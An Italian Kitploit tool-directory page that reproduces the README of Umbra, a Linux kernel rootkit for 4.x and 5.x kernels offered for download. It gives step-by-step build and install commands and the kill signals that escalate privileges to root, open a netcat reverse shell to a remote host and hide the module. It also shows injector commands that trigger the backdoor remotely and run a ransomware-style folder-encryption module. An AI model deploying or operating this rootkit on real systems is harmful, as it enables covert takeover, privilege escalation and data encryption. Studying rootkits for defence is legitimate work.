Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Umbra — Un rootkit LKM che prende di mira le versioni del kernel 4.x e 5.x, che apre una backdoor in grado di generare una reverse shell verso un host remoto, lanciare malware e altro ancora. | Kitploit
Strumenti/GitHubGitHub/h3xduck/umbra
Escalation di PrivilegiStrumenti di Crittografia/DecrittografiaMeccanismi di PersistenzaEvasione IDS/IPSPost-ExploitCommand and ControlApprendimento e FormazioneSviluppo PayloadTrojan di Accesso Remoto
GitHubh3xduck/umbra

Umbra

Un rootkit LKM che prende di mira le versioni del kernel 4.x e 5.x, che apre una backdoor in grado di generare una reverse shell verso un host remoto, lanciare malware e altro ancora.

136274 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

GitHub release (latest by date including pre-releases) Maintainability GitHub code size in bytes GitHub last commit

Umbra

Umbra è un rootkit LKM sperimentale controllabile da remoto per kernel 4.x e 5.x (fino alla 5.7) che apre un backdoor di rete in grado di generare shell inverse verso host remoti, eseguire malware da remoto e molto altro.

Il rootkit è ancora in fase di sviluppo, sebbene le funzionalità elencate di seguito siano già pienamente operative.

Backdoor in azione

Nota: Questo rootkit è stato sviluppato e testato utilizzando il kernel 5.4.0 e Ubuntu 18.04.

Caratteristiche

  • 🌟 Backdoor che genera una shell inversa verso un IP remoto dopo aver ricevuto un pacchetto TCP malevolo.
  • 🌟 Usa Umbra Injector per controllare il rootkit da remoto:
    • Shell inversa remota.
    • Nascondi/mostra il rootkit da remoto.
    • Avvia Umbra Modules.
  • NUOVO: Aggiunti i Umbra Modules, moduli speciali simili a malware che potenziano Umbra e possono essere avviati da remoto tramite Umbra Injector.
  • NUOVO: Modulo Umbra "Ransom" che trasforma Umbra in un ransomware controllabile da remoto.

Modulo Ransom in azione

  • Umbra nasconde tutti i suoi file e directory dai comandi utente come ls.
  • Umbra può nascondersi/mostrarsi da remoto e localmente tramite segnali.
  • Escalation dei privilegi inviando il segnale 50.
  • Avvia una shell inversa netcat al caricamento del modulo.
  • Avvia una shell inversa netcat verso un host remoto inviando il segnale 51.

Ulteriori funzionalità arriveranno negli aggiornamenti successivi.

Disclaimer

Questo rootkit è puramente a scopo educativo. Non sono responsabile per eventuali danni derivanti da un uso improprio.

Tieni inoltre presente che Umbra incorpora solo meccanismi leggeri di occultamento e protezione. Non è destinato all'uso in uno scenario reale.

IMPORTANTE: Se intendi testare questo rootkit sulla tua macchina, raccomando vivamente di usare una VM.

Informazioni sugli Umbra Modules: Il modulo ransom utilizza un meccanismo di crittografia banale, ma può e certamente crittograferà qualsiasi cartella nella tua macchina. Sebbene i file possano essere facilmente decifrati, sconsiglio assolutamente di eseguirlo verso la cartella root o simili se non in un ambiente controllato.

Indice

  1. Costruzione e installazione
  2. Rimozione di Umbra
  3. Controllo locale
  4. Umbra Injector: Controllo remoto
  5. Umbra Modules
    • (NUOVO) Ransom
  6. Riferimenti

Costruzione e installazione

Ricorda che devi avere un kernel 4.x o 5.x disponibile.

  1. Scarica i file header del tuo kernel
root@kitploit:~
apt install linux-headers-$(uname -r)
  1. Configura il tuo percorso di inclusione per coprire la directory degli header del kernel (di solito in /usr/src). Se usi vscode, puoi controllare .vscode/c_cpp_properties.json per un esempio delle directory da includere.

  2. Clona il progetto

root@kitploit:~
git clone https://github.com/h3xduck/Umbra.git
cd Umbra
  1. Compila Umbra
root@kitploit:~
make
  1. Carica Umbra nel kernel e configura l'ambiente Lo script installerà Umbra nel kernel e configurerà una directory speciale per memorizzare i moduli malware. La directory verrà poi nascosta dal rootkit.
root@kitploit:~
sudo ./install.sh

Se hai già eseguito lo script in precedenza e desideri solo installare Umbra nel kernel, puoi eseguire:

root@kitploit:~
sudo insmod ./umbra.ko

Rimozione di Umbra

Assicurati che Umbra non sia in modalità invisibile, altrimenti fallirà.

root@kitploit:~
sudo rmmod umbra

Utilizzo base: Controllo locale

Eleva i privilegi dell'utente corrente a root

  • Invia il segnale 50 a qualsiasi PID.
root@kitploit:~
kill -50 1

Avvia una shell inversa netcat verso IP:PORTA

  • Imposta l'IP e la porta desiderati in CONFIG.H prima di compilare il rootkit. Di default 127.0.0.1:5888

  • Inizia ad ascoltare sull'host remoto.

root@kitploit:~
nc -lvp 5888
  • Invia il segnale 51 a qualsiasi PID. Umbra lo intercetterà e avvierà la shell.
root@kitploit:~
kill -51 1

Nota: Umbra tenta anche di avviare la shell inversa al caricamento.

Nascondi il rootkit - Modalità invisibile

Questo impedirà al rootkit di essere mostrato da comandi come lsmod, o di essere rimosso tramite rmmod.

root@kitploit:~
kill -52 1

Mostra il rootkit

Ripristina la modalità invisibile se attiva.

root@kitploit:~
kill -53 1

Umbra Injector: Controllo remoto

Ottieni una shell inversa tramite backdoor

Umbra Injector può essere eseguito sia prima dell'installazione di Umbra (ottenendo così la shell una volta installato), sia dopo che Umbra è installato sul sistema di destinazione.

root@kitploit:~
./injector -S 127.0.0.1

Il backdoor ascolta i pacchetti con il seguente payload: UMBRA_PAYLOAD_GET_REVERSE_SHELL.

Puoi anche costruire il tuo injector usando la mia libreria RawTCP.

Nascondi il rootkit da remoto - Modalità invisibile

Questo impedirà al rootkit di essere mostrato da comandi come lsmod, o di essere rimosso tramite rmmod.

root@kitploit:~
./injector -i 127.0.0.1

Mostra il rootkit da remoto

Ripristina la modalità invisibile se attiva.

root@kitploit:~
./injector -u 127.0.0.1

Aiuto

Puoi vedere tutte le informazioni su come eseguire Umbra Injector digitando:

root@kitploit:~
./injector -h

Umbra Modules

Gli Umbra Modules vengono memorizzati dallo script install.sh in /tmp/umbra, dove Umbra li nasconde. La directory non sarà visibile con comandi come ls o simili.

Modulo Ransom

Questo modulo può lanciare attacchi simili a ransomware da remoto tramite Umbra Injector. I file crittografati appaiono con estensione .ubr.

Attualmente il meccanismo di crittografia è un semplice NOP a livello di bit, come prova di concetto. Puoi modificare il modulo per includere il tuo algoritmo di crittografia.

Crittografa una directory e tutte le sue sottodirectory

root@kitploit:~
./injector -p /Tuo/Percorso/Da/Crittografare -e 127.0.0.1

Decrittografa una directory e tutte le sue sottodirectory

root@kitploit:~
./injector -p /Tuo/Percorso/Da/Decrittografare -d 127.0.0.1

Riferimenti

Lo sviluppo di questo rootkit ha richiesto una quantità significativa di ricerca sui LKM e sulle tecniche dei rootkit. Quella che segue è una lista incompleta delle risorse utilizzate: Come creare LKM:

  • https://sysprog21.github.io/lkmpg/

Riferimento syscall Linux:

  • https://syscalls64.paolostivanin.com/

Alcuni riferimenti sui rootkit:

  • https://xcellerator.github.io/posts/
  • https://web.archive.org/web/20160620231623/http://big-daddy.fr/repository/Documentation/Hacking/Security/Malware/Rootkits/writing-rootkit.txt
  • https://github.com/f0rb1dd3n/Reptile

Licenza

Questo progetto è concesso in licenza sotto la licenza GPLv2. Vedi LICENSE

Scarica lo strumento